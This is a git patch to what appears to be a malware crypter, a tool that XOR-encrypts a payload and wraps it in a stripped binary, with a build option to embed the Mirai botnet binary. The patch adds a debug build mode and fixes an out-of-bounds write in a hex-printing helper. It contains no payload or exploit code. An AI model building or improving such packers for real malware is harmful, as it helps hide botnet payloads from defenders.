From 5fe92a79214f6f892390b4145cb8fe4c82a6c1f9 Mon Sep 17 00:00:00 2001
From: segfault <segfault@secmail.pro>
Date: Fri, 8 Feb 2019 14:11:12 +0100
Subject: Makefile: added DEBUG mode crypter: fixed possible
 write-out-of-bounds error

Signed-off-by: segfault <segfault@secmail.pro>
---
 Makefile       | 7 +++++++
 exec_crypter.c | 8 +++++---
 2 files changed, 12 insertions(+), 3 deletions(-)

diff --git a/Makefile b/Makefile
index 71d746b..9732231 100644
--- a/Makefile
+++ b/Makefile
@@ -11,6 +11,9 @@ endif
 ifeq ($(USE_MIRAI),y)
 USE_PAYLOAD := mirai.x86
 endif
+ifeq ($(DEBUG),y)
+CFLAGS += -g
+endif
 
 
 all: exec_crypter
@@ -18,6 +21,7 @@ all: exec_crypter
 ifeq ($(USE_PAYLOAD),)
 exec_payload: exec_payload.c
 	$(CC) $(CFLAGS) -o $@ $<
+ifneq ($(DEBUG),y)
 	$(STRIP) -s \
 		--remove-section=.comment \
 		--remove-section=.eh_frame \
@@ -25,6 +29,7 @@ exec_payload: exec_payload.c
 		--remove-section=.jcr \
 		--remove-section=.gcc_except_table \
 		$@
+endif
 else
 exec_payload: $(USE_PAYLOAD)
 	$(CP) -v $(USE_PAYLOAD) $@
@@ -38,6 +43,7 @@ exec_crypter.o: exec_crypter.c
 
 exec_crypter: include_payload.o exec_crypter.o
 	$(CC) $(CFLAGS) -o $@ include_payload.o exec_crypter.o
+ifneq ($(DEBUG),y)
 	$(STRIP) -s \
 		--remove-section=.comment \
 		--remove-section=.eh_frame \
@@ -45,6 +51,7 @@ exec_crypter: include_payload.o exec_crypter.o
 		--remove-section=.jcr \
 		--remove-section=.gcc_except_table \
 		$@
+endif
 
 clean:
 	$(RM) -f exec_payload include_payload.o exec_crypter.o exec_crypter .exec_crypter
diff --git a/exec_crypter.c b/exec_crypter.c
index e8763e5..706708a 100644
--- a/exec_crypter.c
+++ b/exec_crypter.c
@@ -96,7 +96,7 @@ shexbuf(uint8_t *buf, size_t buflen, char *dest, size_t destlen)
     static const char hexal[] = "0123456789ABCDEF";
     uint8_t halfByte;
 
-    for (i = 0, j = 0; i < buflen && j < destlen; ++i, j += 3) {
+    for (i = 0, j = 0; i < buflen && j+2 < destlen; ++i, j += 3) {
         halfByte = buf[i] >> 4;
         dest[j+0] = hexal[ halfByte % 16 ];
         halfByte = buf[i] & 0x0F;
@@ -104,7 +104,9 @@ shexbuf(uint8_t *buf, size_t buflen, char *dest, size_t destlen)
         dest[j+2] = ' ';
     }
 
-    dest[j+2] = 0;
+    if (j)
+        dest[j-1] = 0;
+
     return dest;
 }
 
@@ -179,7 +181,7 @@ int main(int argc, char **argv) {
          * assume that our payload is unencrypted
          */
         xor_genkey(trailer);
-        printf("\nEmpty XOR key .. generated: %s\n",
+        printf("\nEmpty XOR key .. generated: '%s'\n",
                shexbuf((uint8_t *) trailer->xorkey,
                        sizeof trailer->xorkey,
                        temp, sizeof temp));
-- 
cgit v1.2.3